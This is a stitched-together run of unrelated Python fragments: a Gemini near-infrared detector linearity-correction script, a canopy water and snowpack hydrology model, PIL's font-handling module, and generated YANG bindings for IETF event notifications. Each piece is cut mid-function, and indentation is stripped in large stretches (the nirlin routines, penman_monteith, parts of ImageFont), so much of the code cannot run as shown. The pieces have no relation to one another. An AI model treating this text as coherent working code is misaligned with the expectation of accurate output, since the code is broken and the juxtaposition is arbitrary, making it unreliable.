    print '            If no .fits is included this is assumed to be a directory'
    print '       -v : verbose debugging output\n'
    print 'VERSION'
    print '       ', version
    print ''
    raise SystemExit
#-----------------------------------------------------------------------
def main():
try:
opts,_ = getopt.getopt(sys.argv[1:], 'b:fo:v')
except getopt.GetoptError:
usage()
sys.exit(2)
nargs = len(sys.argv[1:])
nopts = len(opts)
badval = 0
force = False
outputfile = 'default'
verbose = False
for o, a in opts:
if o in ('-b'): # value for bad pixels (over correction limit)
badval = a
nopts += 1
if o in ('-f'): # force correction on all pixels, even if over limit
force = True
if o in ('-o'): # linearized output file
outputfile = a
nopts += 1
if o in ('-v'): # verbose debugging output
verbose = True
if (verbose):
print "...nargs = ", nargs
print "...nopts = ", nopts
if (nargs - nopts) != 1:
usage()
inputfile = sys.argv[nopts+1]
files = glob.glob(inputfile)
if (verbose):
print '...files = ', files
for f in files:
nirlin(f,badval=badval,force=force,outputfile=outputfile,verbose=verbose)
#-----------------------------------------------------------------------
def getCoefficients(naxis2, welldepth, readmode, force=False):
if readmode == 'low-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 1.2662732
g = 7.3877618e-06
e = 1.940645271e-10
params = (dt,g,e)
elif readmode == 'medium-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.09442515154
g = 3.428783846e-06
e = 4.808353308e-10
params = (dt,g,e)
elif readmode == 'medium-noise' and naxis2 == 256 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.01029262589
g = 6.815415667e-06
e = 2.125210479e-10
params = (dt,g,e)
elif readmode == 'high-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.009697324059
g = 3.040036696e-06
e = 4.640788333e-10
params = (dt,g,e)
elif readmode == 'high-noise' and naxis2 == 1024 and welldepth == 'deep':
maxcounts = 21000
dt = 0.007680816203
g = 3.581914163e-06
e = 1.820403678e-10
params = (dt,g,e)
else:
print 'ERROR: coefficients do not exist for this mode.'
print 'Please contact Gemini Observatory for more information.'
sys.exit(2)
if force:
maxcounts = 65000
print '...forcing linearity correction on all pixels'
else:
print '...upper limit for linearization =', maxcounts, 'ADU/coadd'
return maxcounts,params
#-----------------------------------------------------------------------
def getSVDCorrection(counts, gamma, eta):
    """Apply the cubic (SVD-fit) linearity correction to raw counts.

    Returns counts + gamma*counts^2 + eta*counts^3; works elementwise on
    scalars or numpy arrays.
    """
    quadratic = gamma * counts**2
    cubic = eta * counts**3
    return counts + quadratic + cubic
#-----------------------------------------------------------------------
def nirlin(inputfile, badval=0, force=False, outputfile='default', verbose=False):
print 'NIRLIN v.', version
# Check file names
if not inputfile.endswith('.fits'):
inputfile = inputfile + '.fits'
if outputfile == 'default':
#outputfile = os.path.join(os.path.dirname(inputfile), 'l' + os.path.basename(inputfile))
outputfile = 'l' + os.path.basename(inputfile)
else:
if ( not outputfile.endswith('.fits') ):
# outputfile = outputfile + '.fits'
if not os.path.isdir(outputfile):
os.mkdir(outputfile)
outputfile = outputfile + '/l' + os.path.basename(inputfile)
if verbose:
print '...output = ', outputfile
# Error checking:
if not os.path.exists(inputfile): # check whether input file exists
print inputfile, 'does not exist'
sys.exit(2)
if os.path.exists(outputfile): # check whether output file exists
print '...removing old', outputfile
os.remove(outputfile)
print '...reading', inputfile
hdulist = pyfits.open(inputfile)
print '...verifying...'
if verbose:
hdulist.verify('fix')
else:
hdulist.verify('silentfix')
# Check if this image has already been linearized:
try:
history = hdulist[0].header['HISTORY']
except:
history = ''
if verbose:
print '...history = ', history
if str(history).count("Linearized by nirlin.py") > 0:
print "ERROR: ", history
sys.exit(2)
# Get the number of extensions in the image:
next = len(hdulist)
if verbose:
print '...number of extensions =', next
if next == 1:
sci = 0
else:
sci = 1
if verbose:
print '...assuming science data are in extension', sci
# Get the image dimensions:
try:
naxis1,naxis2 = hdulist[sci].header['NAXIS1'],hdulist[sci].header['NAXIS2']
print '...image dimensions =', naxis1, 'x', naxis2
except:
print 'ERROR: cannot get the dimensions of extension ', sci
pyfits.info(inputfile)
sys.exit(2)
exptime = hdulist[0].header['EXPTIME']
print '...input exposure time =', exptime, 's'
# Check that exposure time is in range:
if exptime > 600:
print 'WARNING: exposure time is outside the range used to derive correction.'
# Read science data:
counts = hdulist[sci].data
if verbose:
print 'INPUT DATA:'
print counts
print '...mean of input image =', numpy.mean(counts)
# Convert to counts / coadd:
coadds = hdulist[0].header['COADDS']
print '...number of coadds =', coadds
if coadds > 1:
print '...converting to counts / coadd...'
counts = counts / coadds
# Nprepare modifies the exposure time keyword value to be exptime * ncoadds
# so if nprepared, undo this operation to get the original exposure time:
nprepared = False
try:
hdulist[0].header['PREPARE']
print '...image has been nprepared'
nprepared = True
except:
if verbose:
print '...image has not been nprepared (which is okay)'
if nprepared and coadds > 1:
print '...converting to exptime / coadd...'
exptime = exptime / coadds
print '...exptime = ', exptime
# Read mode:
lnrs = hdulist[0].header['LNRS']
print '...number of low noise reads =', lnrs
ndavgs = hdulist[0].header['NDAVGS']
print '...number of digital averages =', ndavgs
if ( lnrs == 1 and ndavgs == 1 ):
readmode = 'high-noise'
elif ( lnrs == 1 and ndavgs == | |
380 ppm
fCO2 = 1.0 - 0.387 * np.log(CO2 / 380.0)
# leaf level light-saturated gs (m/s)
gs = np.minimum(1.6*(1.0 + g1 / np.sqrt(D))*Amax / 380. / rhoa, 0.1) # large values if D -> 0
# canopy conductance
Gc = gs * fQ * Rew * fCO2 * fPheno
Gc[np.isnan(Gc)] = eps
""" --- transpiration rate --- """
Tr = penman_monteith((1.-tau)*AE, 1e3*D, Ta, Gc, 1./Ra, units='mm')
Tr[Tr < 0] = 0.0
"""--- forest floor evaporation rate--- """
Gcs = self.gsoil
Efloor = beta * penman_monteith(tau * AE, 1e3*D, Ta, Gcs, 1./Ras, units='mm')
Efloor[self.SWE > 0] = 0.0 # no evaporation from floor if snow on ground or beta == 0
return Tr, Efloor, Gc, gs
    def canopy_water_snow(self, dt, T, Prec, AE, D, Ra=25.0, U=2.0):
        """
        Calculates canopy water interception and snowpack water equivalent
        (SWE) during timestep dt, updating the grid state in place.
        Args:
            dt - timestep [s]
            T - air temperature (degC), scalar or grid
            Prec - precipitation rate during timestep (mm), scalar or grid
            AE - available energy (~net radiation) (Wm-2)
            D - vapor pressure deficit (kPa)
            Ra - canopy aerodynamic resistance (s m-1)
            U - wind speed (m s-1), used in the snow-sublimation resistance
        Returns (all mm unless noted):
            PotInf - potential infiltration to soil profile
            Trfall - throughfall to field layer or snowpack
            Evap - evaporation / sublimation from canopy store
            Interc - interception by the canopy
            MBE - mass balance error
            erate - 'potential' evaporation / sublimation rate
            Unload - snow unloaded from the canopy
            fS + fW - snow + water fractions of precipitation (==1 per cell)
        Side effects: updates self.W, self.SWE, self.SWEi, self.SWEl.
        <NAME> & <NAME> 2014 - 2017. Last edit 12 / 2017
        """
        # quality of precipitation
        Tmin = self.Tmin  # 'C, below all is snow
        Tmax = self.Tmax  # 'C, above all is water
        # NOTE(review): melt threshold is taken from self.Tmin, not a
        # separate self.Tmelt parameter -- confirm intentional
        Tmelt = self.Tmin  # 'C, T when melting starts

        # storage capacities mm
        Wmax = self.wmax * self.LAI
        Wmaxsnow = self.wmaxsnow * self.LAI

        # melting/freezing coefficients mm/s
        # NOTE(review): subtracting 1.64*cf/dt from Kmelt -- verify against
        # the cited Kuusisto parameterization
        Kmelt = self.Kmelt - 1.64 * self.cf / dt  # Kuusisto E, '<NAME>'
        Kfreeze = self.Kfreeze

        kp = self.physpara['kp']
        tau = np.exp(-kp*self.LAI)  # fraction of Rn at ground

        # inputs to arrays, needed for indexing later in the code
        gridshape = np.shape(self.LAI)  # rows, cols

        if np.shape(T) != gridshape:
            T = np.ones(gridshape) * T
            Prec = np.ones(gridshape) * Prec

        # latent heat of vaporization (Lv) and sublimation (Ls) J kg-1
        Lv = 1e3 * (3147.5 - 2.37 * (T + 273.15))
        Ls = Lv + 3.3e5

        # compute 'potential' evaporation / sublimation rates for each grid cell
        Ga = 1. / Ra  # aerodynamic conductance

        # resistance for snow sublimation adopted from:
        # Pomeroy et al. 1998 Hydrol proc; Essery et al. 2003 J. Climate;
        # Best et al. 2011 Geosci. Mod. Dev.
        # ri = (2/3*rhoi*r**2/Dw) / (Ce*Sh*W) == 7.68 / (Ce*Sh*W)
        Ce = 0.01*((self.W + eps) / Wmaxsnow)**(-0.4)  # exposure coeff (-)
        Sh = (1.79 + 3.0*U**0.5)  # Sherwood numbner (-)
        # below Tmin the surface conductance follows the sublimation model;
        # above it a very large value (1e6) leaves evaporation unlimited
        gi = np.where(T <= Tmin, Sh*self.W*Ce / 7.68 + eps, 1e6)  # m s-1
        Lambda = np.where(T <= Tmin, Ls, Lv)  # pick sublimation vs vaporization heat

        # evaporation of interception storage, mm (only during rainless steps)
        erate = np.where(Prec==0,
                         dt / Lambda * penman_monteith((1.0 - tau)*AE, 1e3*D, T, gi, Ga, units='W'),
                         0.0)

        # ---state of precipitation [as water (fW) or as snow(fS)]
        fW = np.where(T >= Tmax, 1.0, 0.0)
        ix = ((T > Tmin) & (T < Tmax))
        fW[ix] = (T[ix] - Tmin) / (Tmax - Tmin)  # linear mix between thresholds
        fS = 1.0 - fW

        # correction of precipitation (snowfall scaled by gauge factor cs)
        Prec = Prec * fW + Prec * fS * self.cs

        """ --- initial conditions for calculating mass balance error --"""
        Wo = self.W  # canopy storage
        SWEo = self.SWE  # Snow water equivalent mm

        """ --------- Canopy water storage change -----"""
        # snow unloading from canopy, ensures also that seasonal LAI development does
        # not mess up computations
        # Unload = np.where(T >= Tmax, np.maximum(self.W - Wmax, 0.0), 0.0)
        Unload = np.where(T >= Tmin, np.maximum(self.W - Wmax, 0.0), np.maximum(self.W - Wmaxsnow, 0.0))
        self.W = self.W - Unload

        # Interception of rain or snow: asymptotic approach of saturation.
        # Hedstrom & Pomeroy 1998. Hydrol. Proc 12, 1611-1625;
        # Koivusalo & Kokkonen 2002 J.Hydrol. 262, 145-164.
        # above Tmin, interception capacity equals that of liquid precip
        Interc = np.where(T < Tmin,
                          (Wmaxsnow - self.W)* (1.0 - np.exp(-(self.cf / Wmaxsnow) * Prec)),
                          np.maximum(0.0, (Wmax - self.W))* (1.0 - np.exp(-(self.cf / Wmax) * Prec)))
        self.W = self.W + Interc  # new canopy storage, mm

        Trfall = Prec + Unload - Interc  # Throughfall to field layer or snowpack

        # evaporate from canopy and update storage (cannot exceed storage)
        Evap = np.minimum(erate, self.W)  # mm
        self.W = self.W - Evap

        """ Snowpack (in case no snow, all Trfall routed to floor) """
        # melting positive, freezing negative; both capped by available phase
        Melt_Freeze = np.where(T >= Tmelt,
                               np.minimum(self.SWEi, Kmelt * dt * (T - Tmelt)),
                               -np.minimum(self.SWEl, Kfreeze * dt * (Tmelt - T)))

        # amount of water as ice and liquid in snowpack
        Sice = np.maximum(0.0, self.SWEi + fS * Trfall - Melt_Freeze)
        Sliq = np.maximum(0.0, self.SWEl + fW * Trfall + Melt_Freeze)

        # liquid above the retention capacity (R * ice) drains as infiltration
        PotInf = np.maximum(0.0, Sliq - Sice * self.R)  # mm
        Sliq = np.maximum(0.0, Sliq - PotInf)  # mm, liquid water in snow

        # update Snowpack state variables
        self.SWEl = Sliq
        self.SWEi = Sice
        self.SWE = self.SWEl + self.SWEi

        # mass-balance error mm
        MBE = (self.W + self.SWE) - (Wo + SWEo) - (Prec - Evap - PotInf)

        return PotInf, Trfall, Evap, Interc, MBE, erate, Unload, fS + fW
""" *********** utility functions ******** """
# @staticmethod
def degreeDays(dd0, T, Tbase, doy):
    """Accumulate the degree-day sum with today's mean air temperature.

    Args:
        dd0: degree-day sum so far (degC); reset to zero on Jan 1 (doy == 1)
        T: daily mean temperature (degC)
        Tbase: base temperature above which degree-days accumulate (degC)
        doy: day of year, 1...366
    Returns:
        updated degree-day sum (degC)
    """
    accumulated = 0. if doy == 1 else dd0
    return accumulated + max(0, T - Tbase)
# @staticmethod
def eq_evap(AE, T, P=101300.0, units='W'):
    """Equilibrium evaporation after McNaughton & Spriggs (1986).

    Args:
        AE: available energy (Wm-2)
        T: air temperature (degC); scalar (the sign test is scalar-only)
        P: ambient pressure (Pa)
        units: 'W' (Wm-2), 'mm' (mm s-1 = kg m-2 s-1) or 'mol' (mol m-2 s-1)
    Returns:
        non-negative equilibrium evaporation rate in the requested units
    """
    molar_mass_water = 18e-3  # kg mol-1
    if T < 0:
        # latent heat of sublimation [J/kg]
        latent = 1e3 * (2834.1 - 0.29 * T - 0.004 * T ** 2)
    else:
        # latent heat of vaporization [J/kg]
        latent = 1e3 * (2500.8 - 2.36 * T + 1.6e-3 * T ** 2 - 6e-5 * T ** 3)
    _, slope, psycho = e_sat(T, P)
    rate = np.divide(AE * slope, slope + psycho)  # Wm-2 = Js-1m-2
    if units == 'mm':
        rate = rate / latent  # kg m-2 s-1 = mm s-1
    elif units == 'mol':
        rate = rate / latent / molar_mass_water  # mol m-2 s-1
    return np.maximum(rate, 0.0)
# @staticmethod
def e_sat(T, P=101300, Lambda=2450e3):
    """Saturation vapor pressure and psychrometric quantities.

    Args:
        T: air temperature (degC)
        P: ambient pressure (Pa)
        Lambda: latent heat of vaporization (J kg-1)
    Returns:
        (esa, s, g): saturation vapor pressure [Pa], slope of the
        saturation curve [Pa K-1], psychrometric constant [Pa K-1]
    """
    heat_capacity = 1004.67  # cp of air, J/kg/K
    # Magnus-type saturation vapor pressure [Pa]
    esat = 1e3 * 0.6112 * np.exp((17.67 * T) / (T + 273.16 - 29.66))
    # slope of the saturation vapor pressure curve [Pa K-1]
    slope = 17.502 * 240.97 * esat / ((240.97 + T) ** 2)
    # psychrometric constant [Pa K-1]
    psycho = P * heat_capacity / (0.622 * Lambda)
    return esat, slope, psycho
# @staticmethod
def penman_monteith(AE, D, T, Gs, Ga, P=101300.0, units='W'):
"""
Computes latent heat flux LE (Wm-2) i.e evapotranspiration rate ET (mm/s)
from Penman-Monteith equation
INPUT:
AE - available energy [Wm-2]
VPD - vapor pressure deficit [Pa]
T - ambient air temperature [degC]
Gs - surface conductance [ms-1]
Ga - aerodynamic conductance [ms-1]
P - ambient pressure [Pa]
units - W (Wm-2), mm (mms-1=kg m-2 s-1), mol (mol m-2 s-1)
OUTPUT:
x - evaporation rate in 'units'
"""
# --- | |
<reponame>ashutoshsuman99/Web-Blog-D19
#
# The Python Imaging Library.
# $Id$
#
# PIL raster font management
#
# History:
# 1996-08-07 fl created (experimental)
# 1997-08-25 fl minor adjustments to handle fonts from pilfont 0.3
# 1999-02-06 fl rewrote most font management stuff in C
# 1999-03-17 fl take pth files into account in load_path (from <NAME>)
# 2001-02-17 fl added freetype support
# 2001-05-09 fl added TransposedFont wrapper class
# 2002-03-04 fl make sure we have a "L" or "1" font
# 2002-12-04 fl skip non-directory entries in the system path
# 2003-04-29 fl add embedded default font
# 2003-09-27 fl added support for truetype charmap encodings
#
# Todo:
# Adapt to PILFONT2 format (16-bit fonts, compressed, single file)
#
# Copyright (c) 1997-2003 by Secret Labs AB
# Copyright (c) 1996-2003 by <NAME>
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isDirectory, isPath, py3
import os
import sys
# Text-layout engine selectors for FreeTypeFont (see core.getfont):
LAYOUT_BASIC = 0  # PIL's basic layout
LAYOUT_RAQM = 1   # libraqm layout (used when core.HAVE_RAQM is true)
class _imagingft_not_installed(object):
# module placeholder
def __getattr__(self, id):
raise ImportError("The _imagingft C module is not installed")
try:
from . import _imagingft as core
except ImportError:
core = _imagingft_not_installed()
# FIXME: add support for pilfont2 format (see FontFile.py)
# --------------------------------------------------------------------
# Font metrics format:
# "PILfont" LF
# fontdescriptor LF
# (optional) key=value... LF
# "DATA" LF
# binary data: 256*10*2 bytes (dx, dy, dstbox, srcbox)
#
# To place a character, cut out srcbox and paste at dstbox,
# relative to the character position. Then move the character
# position according to dx, dy.
# --------------------------------------------------------------------
class ImageFont(object):
    """PIL font wrapper: loads a bitmap PILfont (a .pil metrics file plus a
    companion glyph image) and exposes getsize/getmask for text rendering."""

    def _load_pilfont(self, filename):
        # Open the .pil metrics file, then locate the companion glyph image
        # (same basename with a .png/.gif/.pbm extension) in mode "1" or "L".
        with open(filename, "rb") as fp:
            for ext in (".png", ".gif", ".pbm"):
                try:
                    fullname = os.path.splitext(filename)[0] + ext
                    image = Image.open(fullname)
                except Exception:
                    pass
                else:
                    if image and image.mode in ("1", "L"):
                        break
            else:
                # for/else: no candidate image opened with a usable mode
                raise IOError("cannot find glyph data file")

            self.file = fullname

            return self._load_pilfont_data(fp, image)

    def _load_pilfont_data(self, file, image):
        # Parse the PILfont header/metrics stream and bind the glyph image.
        # read PILfont header
        if file.readline() != b"PILfont\n":
            raise SyntaxError("Not a PILfont file")
        file.readline().split(b";")  # font descriptor line (currently unused)
        self.info = []  # FIXME: should be a dictionary
        # optional key=value lines up to the "DATA" marker
        while True:
            s = file.readline()
            if not s or s == b"DATA\n":
                break
            self.info.append(s)

        # read PILfont metrics: 256 glyphs * 10 values * 2 bytes
        data = file.read(256 * 20)

        # check image
        if image.mode not in ("1", "L"):
            raise TypeError("invalid font image mode")

        image.load()

        self.font = Image.core.font(image.im, data)

    def getsize(self, text, *args, **kwargs):
        """Return the (width, height) of *text* rendered in this font."""
        return self.font.getsize(text)

    def getmask(self, text, mode="", *args, **kwargs):
        """Return a rendering mask (Image core object) for *text*."""
        return self.font.getmask(text, mode)
##
# Wrapper for FreeType fonts. Application code should use the
# <b>truetype</b> factory function to create font objects.
class FreeTypeFont(object):
"FreeType font wrapper (requires _imagingft service)"
    def __init__(self, font=None, size=10, index=0, encoding="", layout_engine=None):
        """Load a FreeType font.

        :param font: font file path, or a file-like object with the font bytes
        :param size: requested point size
        :param index: face index within the font file
        :param encoding: charmap encoding (e.g. "unic", "symb")
        :param layout_engine: LAYOUT_BASIC or LAYOUT_RAQM; anything else
            auto-selects (RAQM when available, otherwise BASIC)
        """
        # FIXME: use service provider instead

        self.path = font
        self.size = size
        self.index = index
        self.encoding = encoding

        # normalize layout_engine: invalid/None -> auto-select; explicit
        # RAQM falls back to BASIC when libraqm support is missing
        if layout_engine not in (LAYOUT_BASIC, LAYOUT_RAQM):
            layout_engine = LAYOUT_BASIC
            if core.HAVE_RAQM:
                layout_engine = LAYOUT_RAQM
        elif layout_engine == LAYOUT_RAQM and not core.HAVE_RAQM:
            layout_engine = LAYOUT_BASIC
        self.layout_engine = layout_engine

        def load_from_bytes(f):
            # read the whole font into memory and hand the bytes to FreeType
            self.font_bytes = f.read()
            self.font = core.getfont(
                "", size, index, encoding, self.font_bytes, layout_engine
            )

        if isPath(font):
            if sys.platform == "win32":
                font_bytes_path = font if isinstance(font, bytes) else font.encode()
                try:
                    font_bytes_path.decode("ascii")
                except UnicodeDecodeError:
                    # FreeType cannot load fonts with non-ASCII characters on Windows
                    # So load it into memory first
                    with open(font, "rb") as f:
                        load_from_bytes(f)
                    return
            self.font = core.getfont(
                font, size, index, encoding, layout_engine=layout_engine
            )
        else:
            # file-like object (or bytes buffer) rather than a path
            load_from_bytes(font)
def _multiline_split(self, text):
split_character = "\n" if isinstance(text, str) else b"\n"
return text.split(split_character)
def getname(self):
"""
:return: A tuple of the font family (e.g. Helvetica) and the font style
(e.g. Bold)
"""
return self.font.family, self.font.style
def getmetrics(self):
"""
:return: A tuple of the font ascent (the distance from the baseline to
the highest outline point) and descent (the distance from the
baseline to the lowest outline point, a negative value)
"""
return self.font.ascent, self.font.descent
def getsize(self, text, direction=None, features=None, language=None):
    """
    Return the (width, height) in pixels of *text* rendered in this font
    with the given direction, features, and language.

    :param text: Text to measure.
    :param direction: Direction of the text: 'rtl', 'ltr' or 'ttb'.
                      Requires libraqm.
                      .. versionadded:: 4.2.0
    :param features: A list of OpenType font features applied during layout,
                     e.g. 'dlig' or 'ss01' to enable optional features, or
                     '-liga' / '-kern' to disable default ones. See
                     https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
                     Requires libraqm.
                     .. versionadded:: 4.2.0
    :param language: Language of the text, as a `BCP 47 language code
                     <https://www.w3.org/International/articles/language-tags/>`,
                     used to pick language-specific glyph shapes or ligatures.
                     Requires libraqm.
                     .. versionadded:: 6.0.0
    :return: (width, height)
    """
    # The C layer reports the ink size plus a separate offset; the public
    # size includes both.
    (width, height), (x_offset, y_offset) = self.font.getsize(
        text, direction, features, language
    )
    return width + x_offset, height + y_offset
def getsize_multiline(
    self, text, direction=None, spacing=4, features=None, language=None
):
    """
    Return the (width, height) in pixels of *text* rendered in this font
    with the given direction, features, and language, while respecting
    newline characters.

    :param text: Text to measure.
    :param direction: Direction of the text: 'rtl', 'ltr' or 'ttb'.
                      Requires libraqm.
    :param spacing: The vertical gap between lines, defaulting to 4 pixels.
    :param features: A list of OpenType font features applied during layout,
                     e.g. 'dlig' or 'ss01' to enable optional features, or
                     '-liga' / '-kern' to disable default ones. See
                     https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
                     Requires libraqm.
    :param language: Language of the text, as a `BCP 47 language code
                     <https://www.w3.org/International/articles/language-tags/>`,
                     used to pick language-specific glyph shapes or ligatures.
                     Requires libraqm.
                     .. versionadded:: 6.0.0
    :return: (width, height)
    """
    lines = self._multiline_split(text)
    # Line advance is based on a reference glyph ("A") rather than each
    # line's own measured height, so blank lines still take vertical space.
    line_spacing = self.getsize("A")[1] + spacing
    # Only the width of each line matters for the overall width; the
    # original loop also fetched each line's height but never used it.
    max_width = max(
        (self.getsize(line, direction, features, language)[0] for line in lines),
        default=0,
    )
    return max_width, len(lines) * line_spacing - spacing
def getoffset(self, text):
    """
    Return the offset of given text: the gap between the starting
    coordinate and the first marking. Note that this gap is already
    included in the result of
    :py:func:`~PIL.ImageFont.FreeTypeFont.getsize`.

    :param text: Text to measure.
    :return: A tuple of the x and y offset
    """
    # The C layer returns (size, offset); only the offset is wanted here.
    _, offset = self.font.getsize(text)
    return offset
def getmask(self, text, mode="", direction=None, features=None, language=None):
"""
Create a bitmap for the text.
If the font uses antialiasing, the bitmap should have mode ``L`` and use a
maximum value of 255. Otherwise, it should have mode ``1``.
:param text: Text to render.
:param mode: Used by some graphics drivers to indicate what mode the
driver prefers; if empty, the renderer may return either
mode. Note that the mode is always a string, to simplify
C-level implementations.
.. versionadded:: 1.1.5
:param direction: Direction of the text. It can be 'rtl' (right to
left), 'ltr' (left to right) or 'ttb' (top to bottom).
Requires libraqm.
.. versionadded:: 4.2.0
:param features: A list of OpenType font features to be used during text
layout. This is usually used to turn on optional
font features that are not enabled by default,
for example 'dlig' or 'ss01', but can be also
used to turn off default font features for
example '-liga' to disable ligatures or '-kern'
to disable kerning. To get all supported
features, see
https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
Requires libraqm.
.. versionadded:: 4.2.0
:param language: Language of the text. Different languages may use
different glyph shapes or ligatures. This parameter tells
the font which language the text is in, and to apply the
correct substitutions as appropriate, if available.
It should be a `BCP 47 language code
<https://www.w3.org/International/articles/language-tags/>`
Requires libraqm.
.. versionadded:: 6.0.0
:return: An internal PIL storage memory instance as defined by the
:py:mod:`PIL.Image.core` interface | |
<ydk.models.ietf.ietf_event_notifications.DeleteSubscription.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.ietf.ietf_event_notifications.DeleteSubscription.Output>`
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
    """Build the delete-subscription RPC entity with its input/output children."""
    super(DeleteSubscription, self).__init__()
    self._top_entity = None
    # YANG metadata locating this RPC in the model tree.
    self.yang_name = "delete-subscription"
    self.yang_parent_name = "ietf-event-notifications"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([])
    self._leafs = OrderedDict()
    # Wire up the RPC's input and output containers as child entities.
    self.input = DeleteSubscription.Input()
    self.input.parent = self
    self._children_name_map["input"] = "input"
    self.output = DeleteSubscription.Output()
    self.output.parent = self
    self._children_name_map["output"] = "output"
    self._segment_path = lambda: "ietf-event-notifications:delete-subscription"
    # Set last: presumably marks construction complete for YDK's
    # attribute-validation machinery — confirm against Entity.
    self._is_frozen = True
class Input(Entity):
    """
    .. attribute:: subscription_id
    	Identifier of the subscription that is to be deleted. Only subscriptions that were created using establish\-subscription can be deleted via this RPC
    	**type**\: int
    	**range:** 0..4294967295
    	**mandatory**\: True
    """
    _prefix = 'notif-bis'
    _revision = '2016-10-27'
    def __init__(self):
        # Generated entity setup: YANG metadata plus the single
        # subscription-id leaf.
        super(DeleteSubscription.Input, self).__init__()
        self.yang_name = "input"
        self.yang_parent_name = "delete-subscription"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('subscription_id', (YLeaf(YType.uint32, 'subscription-id'), ['int'])),
        ])
        self.subscription_id = None
        self._segment_path = lambda: "input"
        self._absolute_path = lambda: "ietf-event-notifications:delete-subscription/%s" % self._segment_path()
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all attribute writes through YDK's validation hook.
        self._perform_setattr(DeleteSubscription.Input, ['subscription_id'], name, value)
class Output(Entity):
    """
    .. attribute:: subscription_result
    	Indicates whether subscription is operational, or if a problem was encountered
    	**type**\: :py:class:`SubscriptionResult <ydk.models.ietf.ietf_event_notifications.SubscriptionResult>`
    	**mandatory**\: True
    """
    _prefix = 'notif-bis'
    _revision = '2016-10-27'
    def __init__(self):
        # Generated entity setup: YANG metadata plus the single
        # subscription-result identityref leaf.
        super(DeleteSubscription.Output, self).__init__()
        self.yang_name = "output"
        self.yang_parent_name = "delete-subscription"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('subscription_result', (YLeaf(YType.identityref, 'subscription-result'), [('ydk.models.ietf.ietf_event_notifications', 'SubscriptionResult')])),
        ])
        self.subscription_result = None
        self._segment_path = lambda: "output"
        self._absolute_path = lambda: "ietf-event-notifications:delete-subscription/%s" % self._segment_path()
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all attribute writes through YDK's validation hook.
        self._perform_setattr(DeleteSubscription.Output, ['subscription_result'], name, value)
def clone_ptr(self):
    # Create a fresh top-level entity, remember it, and hand it back.
    entity = DeleteSubscription()
    self._top_entity = entity
    return entity
class Streams(Entity):
    """
    This container contains a leaf list of built\-in
    streams that are provided by the system.
    .. attribute:: stream
    	Identifies the built\-in streams that are supported by the system. Built\-in streams are associated with their own identities, each of which carries a special semantics. In case configurable custom streams are supported, as indicated by the custom\-stream identity, the configuration of those custom streams is provided separately
    	**type**\: list of :py:class:`Stream <ydk.models.ietf.ietf_event_notifications.Stream>`
    	**config**\: False
    """
    _prefix = 'notif-bis'
    _revision = '2016-10-27'
    def __init__(self):
        # Generated entity setup: a single identityref leaf-list "stream".
        super(Streams, self).__init__()
        self._top_entity = None
        self.yang_name = "streams"
        self.yang_parent_name = "ietf-event-notifications"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('stream', (YLeafList(YType.identityref, 'stream'), [('ydk.models.ietf.ietf_event_notifications', 'Stream')])),
        ])
        self.stream = []
        self._segment_path = lambda: "ietf-event-notifications:streams"
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all attribute writes through YDK's validation hook.
        self._perform_setattr(Streams, ['stream'], name, value)
    def clone_ptr(self):
        # Produce a fresh top-level Streams entity for YDK's cloning API.
        self._top_entity = Streams()
        return self._top_entity
class Filters(Entity):
    """
    This container contains a list of configurable filters
    that can be applied to subscriptions. This facilitates
    the reuse of complex filters once defined.
    .. attribute:: filter
    	A list of configurable filters that can be applied to subscriptions
    	**type**\: list of :py:class:`Filter <ydk.models.ietf.ietf_event_notifications.Filters.Filter>`
    """
    _prefix = 'notif-bis'
    _revision = '2016-10-27'
    def __init__(self):
        # Generated entity setup: the only child is the keyed "filter" list.
        super(Filters, self).__init__()
        self._top_entity = None
        self.yang_name = "filters"
        self.yang_parent_name = "ietf-event-notifications"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("filter", ("filter", Filters.Filter))])
        self._leafs = OrderedDict()
        self.filter = YList(self)
        self._segment_path = lambda: "ietf-event-notifications:filters"
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all attribute writes through YDK's validation hook.
        self._perform_setattr(Filters, [], name, value)
    class Filter(Entity):
        """
        A list of configurable filters that can be applied to
        subscriptions.
        .. attribute:: filter_id (key)
        	An identifier to differentiate between filters
        	**type**\: int
        	**range:** 0..4294967295
        .. attribute:: filter
        	Filter per RFC 5277. Notification filter. If a filter element is specified to look for data of a particular value, and the data item is not present within a particular event notification for its value to be checked against, the notification will be filtered out. For example, if one were to check for 'severity=critical' in a configuration event notification where this field was not supported, then the notification would be filtered out. For subtree filtering, a non\-empty node set means that the filter matches. For XPath filtering, the mechanisms defined in [XPATH] should be used to convert the returned value to boolean
        	**type**\: anyxml
        .. attribute:: subtree_filter
        	Subtree\-filter used to specify the data nodes targeted for subscription within a subtree, or subtrees, of a conceptual YANG datastore. Objects matching the filter criteria will traverse the filter. The syntax follows the subtree filter syntax specified in RFC 6241, section 6
        	**type**\: anyxml
        .. attribute:: xpath_filter
        	Xpath defining the data items of interest
        	**type**\: str
        """
        _prefix = 'notif-bis'
        _revision = '2016-10-27'
        def __init__(self):
            # Generated entity setup: filter-id is the list key; the other
            # leafs are the three alternative filter representations.
            super(Filters.Filter, self).__init__()
            self.yang_name = "filter"
            self.yang_parent_name = "filters"
            self.is_top_level_class = False
            self.has_list_ancestor = False
